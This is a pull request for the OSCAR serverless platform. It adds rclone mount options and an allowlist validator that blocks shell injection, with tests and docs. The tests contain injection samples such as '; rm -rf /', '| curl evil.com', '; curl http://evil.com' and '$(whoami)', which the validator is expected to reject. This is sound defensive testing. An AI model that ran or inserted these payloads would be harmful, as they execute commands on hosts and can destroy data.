### PR TITLE
fix: sanitize mount options to prevent shell injection

### DIFF
--- a/docs/mount.md
+++ b/docs/mount.md
@@ -38,6 +38,17 @@ functions:
       cpu_threshold: 90
       rewrite_target: true
 ```
+Additionally, you can pass extra flags to the `rclone mount` command using the `options` field:
+
+``` yaml
+mount:
+  storage_provider: minio.default
+  path: /notebook
+  options: "--buffer-size 128M --vfs-read-chunk-size 64M"
+```
+
+These options are appended after the default mount flags, so they can override any built-in setting.
+
 **Note**: You can find the files of this example on [OSCAR's repository examples](https://github.com/grycap/oscar/tree/master/examples/expose_services/jupyter)
 
 As OSCAR has the credentials of the default MinIO instance internally, if you want to use a different one or a different storage provider, you need to set these credentials on the service [FDL](fdl.md). Currently, the storage providers supported on this functionality are:

--- a/pkg/backends/resources/mount.go
+++ b/pkg/backends/resources/mount.go
@@ -17,12 +17,18 @@ limitations under the License.
 package resources
 
 import (
+	"log"
+	"regexp"
 	"strings"
 
 	"github.com/grycap/oscar/v4/pkg/types"
 	"github.com/grycap/oscar/v4/pkg/utils/auth"
 	v1 "k8s.io/api/core/v1"
 )
+
+// validMountOptsRe matches only safe characters for rclone mount flags.
+// Allows alphanumeric, dash, underscore, dot, colon, equals, comma, slash, and whitespace.
+var validMountOptsRe = regexp.MustCompile(`^[a-zA-Z0-9\-_.:=,/\s]+$`)
 
 var (
 	// Don't restart jobs in order to keep logs
@@ -70,6 +76,16 @@ func addVolume(podSpec *v1.PodSpec) {
 	podSpec.Volumes = append(podSpec.Volumes, volumeshare)
 }
 
+// ValidateMountOpts sanitizes mount options to prevent shell injection.
+// Only allows characters valid for rclone CLI flags.
+func ValidateMountOpts(opts string) string {
+	if opts != "" && !validMountOptsRe.MatchString(opts) {
+		log.Printf("WARNING: mount options contain invalid characters, ignoring: %q", opts)
+		return ""
+	}
+	return opts
+}
+
 func sidecarPodSpec(service types.Service, cfg *types.Config) v1.Container {
 	bidirectional := v1.MountPropagationBidirectional
 	var ptr *bool // Uninitialized pointer
@@ -103,23 +119,28 @@ func sidecarPodSpec(service types.Service, cfg *types.Config) v1.Container {
 	}
 
 	provider := strings.Split(service.Mount.Provider, ".")
+	mountOpts := ValidateMountOpts(service.Mount.Options)
+	if mountOpts != "" {
+		mountOpts = " " + mountOpts
+	}
+
 	if provider[0] == types.MinIOName {
 		if len(provider) == 1 {
 			provider = append(provider, types.DefaultProvider)
 		}
 		MinIOEnvVars := setMinIOEnvVars(service, provider[1], cfg)
 		container.Env = append(container.Env, MinIOEnvVars...)
-		container.Args = []string{"-c", minioCommand + communCommand}
+		container.Args = []string{"-c", minioCommand + communCommand + mountOpts}
 	}
 	if provider[0] == types.S3Name {
 		S3EnvVars := setS3Vars(service, provider[1], cfg)
 		container.Env = append(container.Env, S3EnvVars...)
-		container.Args = []string{"-c", s3Command + communCommand}
+		container.Args = []string{"-c", s3Command + communCommand + mountOpts}
 	}
 	if provider[0] == types.WebDavName {
 		WebDavEnvVars := setWebDavEnvVars(service, provider[1])
 		container.Env = append(container.Env, WebDavEnvVars...)
-		container.Args = []string{"-c", webdavCommand + communCommand}
+		container.Args = []string{"-c", webdavCommand + communCommand + mountOpts}
 	}
 	return container
 

--- a/pkg/backends/resources/mount.go
+++ b/pkg/backends/resources/mount.go
@@ -28,7 +28,7 @@ import (
 
 // validMountOptsRe matches only safe characters for rclone mount flags.
 // Allows alphanumeric, dash, underscore, dot, colon, equals, comma, slash, and whitespace.
-var validMountOptsRe = regexp.MustCompile(`^[a-zA-Z0-9\-_.:=,/\s]+$`)
+var validMountOptsRe = regexp.MustCompile(`^[a-zA-Z0-9\-_.:=,/ ]+$`)
 
 var (
 	// Don't restart jobs in order to keep logs

--- a/pkg/backends/resources/mount_test.go
+++ b/pkg/backends/resources/mount_test.go
@@ -16,6 +16,7 @@ limitations under the License.
 package resources
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/grycap/oscar/v4/pkg/types"
@@ -74,6 +75,21 @@ func TestSetMount(t *testing.T) {
 
 	if container.Image != rcloneContainerImage {
 		t.Errorf("expected container image %s, got %s", rcloneContainerImage, container.Image)
+	}
+
+	if len(podSpec.InitContainers) != 1 {
+		t.Fatalf("expected 1 init container, got %d", len(podSpec.InitContainers))
+	}
+
+	initContainer := podSpec.InitContainers[0]
+	if len(initContainer.Args) != 2 {
+		t.Fatalf("expected 2 args, got %d", len(initContainer.Args))
+	}
+	if initContainer.Args[0] != "-c" {
+		t.Errorf("expected arg[0] to be '-c', got %s", initContainer.Args[0])
+	}
+	if !strings.Contains(initContainer.Args[1], "--allow-other") {
+		t.Errorf("expected default communCommand flags in args, got %s", initContainer.Args[1])
 	}
 
 	expectedEnvVars := map[string]string{
@@ -218,5 +234,196 @@ func TestSetWebDavEnvVars(t *testing.T) {
 		} else {
 			t.Errorf("unexpected env var %s", envVar.Name)
 		}
+	}
+}
+
+func TestValidateMountOpts(t *testing.T) {
+	tests := []struct {
+		name  string
+		input string
+		want  string
+	}{
+		{
+			name:  "empty options",
+			input: "",
+			want:  "",
+		},
+		{
+			name:  "valid flags",
+			input: "--buffer-size 128M --vfs-read-chunk-size 64M",
+			want:  "--buffer-size 128M --vfs-read-chunk-size 64M",
+		},
+		{
+			name:  "valid dash flags",
+			input: "--read-only --no-checksum",
+			want:  "--read-only --no-checksum",
+		},
+		{
+			name:  "valid with dots and colons",
+			input: "--config /etc/rclone/rclone.conf --timeout 30s",
+			want:  "--config /etc/rclone/rclone.conf --timeout 30s",
+		},
+		{
+			name:  "rejects shell semicolon",
+			input: "--foo; rm -rf /",
+			want:  "",
+		},
+		{
+			name:  "rejects shell pipe",
+			input: "--foo | curl evil.com",
+			want:  "",
+		},
+		{
+			name:  "rejects command substitution",
+			input: "--foo $(whoami)",
+			want:  "",
+		},
+		{
+			name:  "rejects backtick",
+			input: "--foo `id`",
+			want:  "",
+		},
+		{
+			name:  "rejects ampersand",
+			input: "--foo & whoami",
+			want:  "",
+		},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got := ValidateMountOpts(tt.input)
+			if got != tt.want {
+				t.Errorf("validateMountOpts(%q) = %q, want %q", tt.input, got, tt.want)
+			}
+		})
+	}
+}
+
+func TestSetMountWithOptions(t *testing.T) {
+	podSpec := &v1.PodSpec{
+		Containers: []v1.Container{
+			{
+				Name:  rcloneContainerName,
+				Image: rcloneContainerImage,
+				Env:   []v1.EnvVar{},
+				VolumeMounts: []v1.VolumeMount{
+					{
+						Name:      rcloneVolumeName,
+						MountPath: rcloneFolderMount,
+					},
+				},
+			},
+		},
+		Volumes: []v1.Volume{},
+	}
+	service := types.Service{
+		Mount: types.StorageIOConfig{
+			Provider: "minio.provider",
+			Path:     "test-bucket",
+			Options:  "--buffer-size 128M --vfs-read-chunk-size 64M",
+		},
+		StorageProviders: &types.StorageProviders{
+			MinIO: map[string]*types.MinIOProvider{
+				"provider": {
+					AccessKey: "test-access-key",
+					SecretKey: "test-secret-key",
+					Endpoint:  "test-endpoint",
+				},
+			},
+		},
+	}
+	cfg := &types.Config{
+		Name: "oscar",
+		MinIOProvider: &types.MinIOProvider{
+			AccessKey: "test-access-key",
+			SecretKey: "test-secret-key",
+		}}
+
+	SetMount(podSpec, service, cfg)
+
+	if len(podSpec.InitContainers) != 1 {
+		t.Fatalf("expected 1 init container, got %d", len(podSpec.InitContainers))
+	}
+
+	initContainer := podSpec.InitContainers[0]
+	if len(initContainer.Args) != 2 {
+		t.Fatalf("expected 2 args, got %d", len(initContainer.Args))
+	}
+	if initContainer.Args[0] != "-c" {
+		t.Errorf("expected arg[0] to be '-c', got %s", initContainer.Args[0])
+	}
+
+	args := initContainer.Args[1]
+	if !strings.Contains(args, "--buffer-size 128M") {
+		t.Errorf("expected mount option '--buffer-size 128M' in args, got: %s", args)
+	}
+	if !strings.Contains(args, "--vfs-read-chunk-size 64M") {
+		t.Errorf("expected mount option '--vfs-read-chunk-size 64M' in args, got: %s", args)
+	}
+	if !strings.Contains(args, "--allow-other") {
+		t.Errorf("expected default communCommand flags in args, got: %s", args)
+	}
+}
+
+func TestSetMountRejectsMaliciousOptions(t *testing.T) {
+	podSpec := &v1.PodSpec{
+		Containers: []v1.Container{
+			{
+				Name:  rcloneContainerName,
+				Image: rcloneContainerImage,
+				Env:   []v1.EnvVar{},
+				VolumeMounts: []v1.VolumeMount{
+					{
+						Name:      rcloneVolumeName,
+						MountPath: rcloneFolderMount,
+					},
+				},
+			},
+		},
+		Volumes: []v1.Volume{},
+	}
+	service := types.Service{
+		Mount: types.StorageIOConfig{
+			Provider: "minio.provider",
+			Path:     "test-bucket",
+			Options:  "; curl http://evil.com",
+		},
+		StorageProviders: &types.StorageProviders{
+			MinIO: map[string]*types.MinIOProvider{
+				"provider": {
+					AccessKey: "test-access-key",
+					SecretKey: "test-secret-key",
+					Endpoint:  "test-endpoint",
+				},
+			},
+		},
+	}
+	cfg := &types.Config{
+		Name: "oscar",
+		MinIOProvider: &types.MinIOProvider{
+			AccessKey: "test-access-key",
+			SecretKey: "test-secret-key",
+		}}
+
+	SetMount(podSpec, service, cfg)
+
+	if len(podSpec.InitContainers) != 1 {
+		t.Fatalf("expected 1 init container, got %d", len(podSpec.InitContainers))
+	}
+
+	initContainer := podSpec.InitContainers[0]
+	args := initContainer.Args[1]
+
+	// Ensure the malicious content was stripped out
+	if strings.Contains(args, "curl") {
+		t.Errorf("malicious option was not sanitized, args contains 'curl': %s", args)
+	}
+	if strings.Contains(args, ";") {
+		t.Errorf("malicious option was not sanitized, args contains ';': %s", args)
+	}
+
+	// But the normal rclone content should still be there
+	if !strings.Contains(args, "--allow-other") {
+		t.Errorf("expected default communCommand flags in args, got: %s", args)
 	}
 }

--- a/pkg/handlers/create.go
+++ b/pkg/handlers/create.go
@@ -27,6 +27,7 @@ import (
 	"strings"
 
 	"github.com/aws/aws-sdk-go/service/s3"
+	"github.com/grycap/oscar/v4/pkg/backends/resources"
 	"github.com/gin-gonic/gin"
 	"github.com/grycap/cdmi-client-go"
 	"github.com/grycap/oscar/v4/pkg/types"
@@ -728,6 +729,9 @@ func createBuckets(service *types.Service, cfg *types.Config, minIOAdminClient *
 	}
 
 	if service.Mount.Provider != "" {
+		if resources.ValidateMountOpts(service.Mount.Options) == "" && service.Mount.Options != "" {
+			return nil, fmt.Errorf("mount options contain invalid characters")
+		}
 		provID, provName = getProviderInfo(service.Mount.Provider)
 		if provName == types.MinIOName {
 			// Check if the provider identifier is defined in StorageProviders

--- a/pkg/types/storage.go
+++ b/pkg/types/storage.go
@@ -61,6 +61,9 @@ type StorageIOConfig struct {
 	Path     string   `json:"path"`
 	Suffix   []string `json:"suffix,omitempty"`
 	Prefix   []string `json:"prefix,omitempty"`
+	// Options defines additional flags for the rclone mount command.
+	// Optional.
+	Options string `json:"options,omitempty"`
 }
 
 // StorageProviders stores the credentials of all supported storage providers


### PR DESCRIPTION
Fixed # https://github.com/grycap/issue-tracker/issues/293

The  field from user-provided service configuration was concatenated directly into a shell command passed to `sh -c`, enabling command injection.

A new exported function `ValidateMountOpts` was added to `pkg/backends/resources/mount.go` that only allows characters valid for rclone CLI flags and rejects shell metacharacters (`;`, `|`, `$`,``` etc.).

Validation is applied at two levels:
- Early validation in the create handler (`pkg/handlers/create.go`) that returns a 400 error for invalid options.
- Defense-in-depth in `sidecarPodSpec` that silently strips malicious options as a safety net.

Tests added for valid rclone flags and various injection attempts.